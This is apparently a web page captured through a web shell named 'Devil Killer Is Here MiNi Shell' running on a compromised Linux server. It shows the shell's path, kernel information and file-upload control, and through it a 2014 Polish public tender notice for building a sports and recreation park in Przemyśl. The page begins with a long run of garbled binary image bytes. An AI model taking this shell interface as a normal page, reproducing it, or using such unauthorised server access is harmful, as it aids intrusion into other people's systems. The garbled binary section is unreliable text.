JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140606/122535-N-2014.html

<p class="kh_header"><b>Przemyśl: Wykonanie wielopokoleniowego parku sportu, rekreacji i wypoczynku przy 
ul. Bohaterów Getta 20-22 w Przemyślu</b><br>
<b>Numer ogłoszenia: 122535 - 2014; data zamieszczenia: 06.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Przemyśl - Prezydent Miasta Przemyśl , ul. Rynek 1, 37-700 Przemyśl, woj. podkarpackie, tel. 016 6782962, 6752072, faks 016 6786449.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przemysl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie wielopokoleniowego parku sportu, rekreacji i wypoczynku przy 
ul. Bohaterów Getta 20-22 w Przemyślu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem   zamówienia  jest wykonanie w systemie zaprojektuj i wybuduj, wielopokoleniowego parku sportu, rekreacji i wypoczynku przy ul. Bohaterów Getta 20-22 
w Przemyślu na działkach nr 635 i 634 obr. 207, w tym:
2. Zakres zamówienia obejmuje : 
2.1. Opracowanie dokumentacji projektowej wraz z uzyskaniem wszelkich wymaganych uzgodnień i pozwoleń na wykonanie robót w imieniu Inwestora.
2.2. Wykonanie robót w następującym zakresie:
a) SKATEPARK betonowy,
b) STREET WORKOUT PARK do treningów opartych o  ćwiczenia z wykorzystaniem masy ciała,
c) siłownia zewnętrzna dla dorosłych i seniorów z montażem urządzeń, 
d) plac zabaw dla najmłodszych z montażem urządzeń zabawowych,
e) wykonanie wiaty drewnianej nieobudowanej o wym. 5x5 m, 
f) utwardzenie placu kostką brukową betonową z wykonaniem paleniska na grill-ognisko, montażem stołu, ławek bez oparcia (6 szt.) i koszy na śmieci (2 szt.)
g) wykonanie chodnika z kostki brukowej betonowej z montażem ławek z oparciem (6 szt.), koszy na śmieci (3 szt.) oraz dojścia do wiaty i grilla,
h) wykonanie brakującego ogrodzenia wys. 1,50 m z siatki ocynkowanej na słupkach stalowych (bez cokołu),
i) wykonanie dwóch furtek w istniejącym ogrodzeniu z remontem ogrodzenia i odtworzeniem bramy wjazdowej,
j) osadzenie obrzeży betonowych 20x6, oddzielających teren STREET WORKOUT PARK 
i siłownię od pozostałego terenu,
k) wykonanie tablic informacyjnych,
l) przygotowanie terenu pod wykonanie zieleni (obsianie trawą).
2.3. Przygotowanie dokumentów związanych z przekazaniem zadania do użytkowania.
2.4. Szczegółowy zakres robót opisuje załączony Program funkcjonalno-użytkowy - załącznik nr 1.
3. Zakres prac projektowych i robót budowlanych został opisany w programie funkcjonalno-użytkowym, który został opracowany na podstawie rozporządzenia Ministra Infrastruktury z dnia  2 września 2004r.  w sprawie szczególnego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania  i odbioru  robót budowlanych  stanowiącym załącznik  Nr 1 do SIWZ. Zamawiający informuje, że program funkcjonalno-użytkowy stanowi wytyczne do projektowania, w związku z czym dopuszcza się dokonywanie w fazie projektowania niezbędnych zmian programu proponowanych przez Wykonawcę , po uzyskaniu akceptacji Zamawiającego oraz służy do ustalenia planowanych kosztów prac projektowych i robót budowlanych i przygotowania oferty szczególnie w zakresie obliczenia ceny oferty oraz wykonania prac projektowych. Wszelkie odstępstwa od  programu  funkcjonalno-użytkowego nie będą wpływać na wartość niniejszego zamówienia publicznego. 
4. Dokumentacja projektowa winna być wykonana w stanie kompletnym  z punktu widzenia celu, któremu ma służyć z niezbędnymi uzgodnieniami oraz zgodnie z obowiązującymi przepisami i normami,
5. Dokumentacja winna posiadać pozwolenie  Wojewódzkiego Podkarpackiego Konserwatora Zabytków z siedzibą w Przemyślu na prowadzenie prac przy zabytku - teren znajduje się 
w strefie ochrony układu urbanistycznego miasta Przemyśla,
6. Jeżeli w trakcie realizacji robót zgodnie z opracowaną dokumentacją projektową, zajdzie konieczność wykonania dodatkowej dokumentacji uzupełniającej, niezbędnej dla realizacji robót -Wykonawca wykona tę dokumentację na własny koszt,
7. Po wykonaniu wstępnych założeń i rozwiązań projektowych, Wykonawca zobowiązany jest do przedstawienia ich Zamawiającemu w celu uzgodnienia i zatwierdzenia,
8. Dokumentacja projektowa powinna zawierać:
- projekt budowlano-wykonawczy zagospodarowania terenu z opisem technicznym 
i rysunkami elementów budowlanych oraz urządzeń sportowych, rekreacyjnych i zabawowych - 4 egz.,
- specyfikację techniczną wykonania i odbioru robót - 2 egz.,
- przedmiar robót wraz z kosztorysem - 2 egz.,
dokumentacja oprócz wersji papierowej winna być wykonana po jednym egzemplarzu 
w wersji elektronicznej ogólnodostępnej
9. Dokumentację projektową należy wykonać w zakresie koniecznym do uzyskania pozwolenia na budowę lub zgłoszenia zgodnie z obowiązującymi przepisami:
- ustawą z dnia 7.07.1994 r. Prawo budowlane  (Dz. U. z 2013 r.  poz. 1409  z późn. zm.), 
- rozporządzeniem  Ministra Infrastruktury z dnia  2 września 2004 r.  w sprawie szczególnego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania  i odbioru  robót budowlanych ww. rozporządzeniem,  ustawą Prawo budowlane, 
- rozporządzeniem Ministra transportu, Budownictwa i Gospodarki Morskiej z dnia 
25 kwietnia 2012 r.  w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U.  z 2012 r. poz. 462).
10. Z chwilą zapłaty wynagrodzenia za wykonanie przedmiotu umowy, autorskie prawa majątkowe przysługujące projektantowi dokumentacji projektowej do wykonania dzieła zostaną przeniesione na Zamawiającego na zasadach określonych w projekcie umowy stanowiącej załącznik nr 10  do SIWZ.
11. Zamawiającemu przysługuje , z poszanowaniem osobistych praw Wykonawcy , prawo do wykorzystania całości lub poszczególnych elementów dokumentacji projektowej na następujących polach eksploatacji: 
- w zakresie utrwalania i zwielokrotniania treści - wytwarzanie określoną techniką egzemplarzy utworu, w tym techniką drukarską, reprograficzną, zapisu magnetycznego  oraz techniką cyfrową;
- w zakresie obrotu oryginałem albo egzemplarzami dokumentacji - wprowadzanie do obrotu, użyczenie lub najem oryginału albo egzemplarzy;
- w zakresie rozpowszechniania dokumentacji projektowej w sposób inny niż - publiczne wystawienie, wyświetlanie, odtworzenie oraz nadanie reemitowanie, a także publiczne udostępnienie dokumentacji.
12. Wykonawca zobowiązany jest:
1)  przejęcia od Zamawiającego placu budowy  w terminie do 7 dni od dnia podpisania umowy przez obie strony,
2) zabezpieczenie we własnym zakresie niezbędnych mediów do realizacji zamówienia (energia elektryczna, woda itp.) oraz pokrywanie ich kosztów,
3) zapewnienie ochrony placu budowy we własnym zakresie,
4) sporządzenie planu bezpieczeństwa i ochrony zdrowia,
5) dokonywanie przy udziale lub z upoważnienia Zamawiającego niezbędnych zawiadomień 
i zgłoszeń
6) zapewnienie kierownika budowy oraz nadzoru autorskiego projektanta w cenie oferty, 
7) wykonanie robót budowlanych na podstawie opracowanej i zatwierdzonej dokumentacji projektowej zgodnie z: pozwoleniem na budowę lub przyjętym zgłoszeniem robót nie wymagających pozwolenia  na budowę, pozwoleniem konserwatora zabytków, obowiązującymi przepisami, normami, zasadami wiedzy technicznej i Specyfikacją Techniczną Istotnych Warunków Zamówienia,
8) wykonanie robót pomocniczych, przygotowawczych i porządkowych oraz naprawa ewentualnych uszkodzeń,
9) zapewnienie prowadzenia obsługi geodezyjnej i wykonanie powykonawczej inwentaryzacji geodezyjnej oraz ponoszenie z tym związanych opłat,
10) zagospodarowanie terenu budowy,
11) zutylizowanie ewentualnych zanieczyszczeń (np. gruz, korzenie) we własnym zakresie,
12) zagospodarowanie we własnym zakresie nadmiaru ziemi powstałej podczas wykonywania robót budowlanych,
13) należyte zabezpieczenie i oznakowanie terenu objętego prowadzonymi robotami budowlanymi,
14) zapewnienie własnego zaplecza budowy,
15) przygotowanie dokumentów wymaganych przepisami prawa związanych z oddaniem obiektu do użytkowania,
16) stosowania przy wykonywaniu robót budowlanych materiałów i wyrobów które zostały dopuszczone do obrotu i stosowania w budownictwie, zgodnie z przepisami ustawy z 16 kwietnia 2004 r. (Dz.U. z 2004 r. Nr 92 poz. 881) o wyrobach budowlanych,
17) prowadzenia robót  pod stałym nadzorem technicznym, z zachowaniem obowiązujących przepisów  w tym bhp i p.poż. 
18) utrzymania porządku i ochrony mienia znajdującego się na terenie budowy i terenach przyległych, Wykonawca zobowiązany jest utrzymywać teren budowy bez przeszkód komunikacyjnych, oraz usuwać na bieżąco zbędne materiały, odpady i śmieci oraz ponieść koszty z tym związane. Wykonawca jest zobowiązany do naprawy wszelkich uszkodzeń powstałych w obrębie placu budowy w okresie od dnia przekazania placu budowy Wykonawcy do dnia uzyskania pozwolenia na użytkowanie,
13. W przypadku, gdy w dokumentacji  zostały wskazane nazwy i znaki towarowe lub typy materiałów czy produkty lub normy, aprobaty, specyfikacje czy systemy, o których mowa w art. 30 ust.1-3  ustawy Pzp., Zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych pod warunkiem, że zapewnią uzyskanie parametrów technicznych nie gorszych od określonych w dokumentacji projektowej- po uprzednim uzyskaniu akceptacji zamawiającego,
14. Zamawiający  zaleca dokonania wizji lokalnej w terenie.
15. Okres gwarancji:
1) Wykonawca udzieli Zamawiającemu gwarancji na okres  36 miesięcy, 
2) początkiem okresu gwarancyjnego jest data podpisania protokołu odbioru. 
3) Wykonawca w okresie trwania gwarancji zobowiązany jest do bezpłatnego dokonywania przeglądów wszystkich wbudowanych elementów i urządzeń oraz ewentualną ich naprawę lub regulację.
16. Wybrany Wykonawca zobowiązany jest dostarczyć Zamawiającemu przed podpisaniem umowy kopę aktualnej polisy ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności obejmującej okres realizacji przedmiotu zamówienia na kwotę nie niższą niż wartość zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 71.00.00.00-8, 45.11.12.91-4, 45.11.27.23-9, 45.21.21.40-9, 45.34.00.00-2, 45.42.11.60-3, 71.22.00.00-6, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 120.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 2000,00</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum jedną robotę budowlaną polegającą na wykonaniu minimum jednego skateparku o konstrukcji betonowej  o łącznej powierzchni nie mniejszej niż 300 m2  potwierdzone dowodami wydanymi przez podmiot na rzecz którego zostało wykonane, że roboty te zostały wykonane w sposób należyty oraz wskazującymi że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia i posiadają uprawnienia niezbędne do wykonania przedmiotu zamówienia wymagane przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane - tj. uprawnienia budowlane wg. rozporządzenia Ministra Transportu 
i Budownictwa    z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych 
w budownictwie ( Dz.U. Nr 83 poz. 578 z późn. zm.) w zakresie projektowania, kierowania robotami budowlanymi  tj:
1) min.  1 osoba posiadająca uprawnienia budowlane do projektowania w specjalności architektonicznej, 
2) min. 1 osoba  posiadająca uprawnienia budowlane  do projektowania  w specjalności  konstrukcyjno-budowlanej,  
3) min. 1 osoba kierownik  budowy  - posiadająca  uprawnienia  budowlane  w specjalności konstrukcyjno budowlanej bez ograniczeń.

Uwaga:
1.	Zamawiający dopuszcza przedstawienie tej samej osoby do pełnienia więcej niż jednej 
z wymienionych powyżej funkcji.
2.	Wybrany Wykonawca zobowiązany jest dostarczyć Zamawiającemu przed podpisaniem umowy:
a) kopie dokumentów potwierdzających uprawnienia osób, które będą uczestniczyć w wykonywaniu zamówienia,
b) kopię dokumentów potwierdzających przynależność do właściwej izby samorządu zawodowego osób, które będą uczestniczyć w wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty:
1) wypełniony i podpisany przez osoby upoważnione do reprezentowania Wykonawcy Formularz oferty według wzoru stanowiącego załącznik nr 2 do SIWZ,
2) pełnomocnictwo osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę o ile osoba reprezentująca wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jej reprezentacji we właściwym rejestrze,
3) pełnomocnictwo o którym mowa w pkt 5.1,
4) formularz cenowy stanowiący załącznik nr 2 A do SIWZ,
5) dowód wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) W przypadku wydłużenia terminu zakończenia prowadzonej procedury przetargowej (np. 
z powodu wniesienia odwołania lub konieczności zabezpieczenia dodatkowych środków finansowych).
2) W przypadku nie uzyskania decyzji administracyjnych, uzgodnień lub opinii niezbędnych do zakończenia prac projektowych stanowiących przedmiot umowy, pomimo złożenia kompletnych  wniosków do właściwych organów w terminach przewidzianych 
w odpowiednich przepisach na ich wydanie. W takim przypadku na uzasadniony wniosek Wykonawcy zostanie ustalony nowy termin wykonania przedmiotu umowy, 
3) W przypadku istotnej zmiany przepisów regulujących wykonanie prac stanowiących przedmiot umowy. W takim przypadku zostanie ustalony nowy termin wykonania przedmiotu umowy.
4) W przypadku przedłużającego się terminu na wydanie decyzji pozwolenia na budowę 
o dodatkowy czas wskazany przez organ wydający pozwolenie, na wyeliminowanie przeszkód nie wynikających  z winy Wykonawcy.
5) przesunięcia terminu realizacji ze względu wystąpienia szczególnie niesprzyjających warunków pogodowych uniemożliwiających prowadzenie robót zgodnie z warunkami technicznymi,
6) W razie wystąpienia konieczności wykonania robót zamiennych, bądź konieczności wprowadzenia istotnych zmian do projektu, powodujących zmianę decyzji o pozwoleniu na budowę lub zgłoszeniu, gdy jest to korzystne dla Zamawiającego i nie powoduje zmiany wartości wynagrodzenia lub powoduje obniżenie wartości wynagrodzenia:
7) W przypadku zaniechania przez Zamawiającego wykonania niektórych robót, wynagrodzenie ryczałtowe z § 5 ust. 1 umowy zostanie pomniejszone o wartość  ryczałtową danego elementu przedmiotu odbioru, w skład którego wchodzą roboty zaniechane.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przemysl.pl BIP roboty budowlane<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Przemyślu, Wieloosobowe Stanowisko ds. Zamówień Publicznych 
ul. Ratuszowa 10A, 37-700 Przemyśl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.06.2014 godzina 09:00, miejsce: Urząd Miejski w Przemyślu, ul. Ratuszowa 10A, 37-700 Przemyśl, Wieloosobowe Stanowisko ds. Zamówień Publicznych (II piętro pok. 205).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
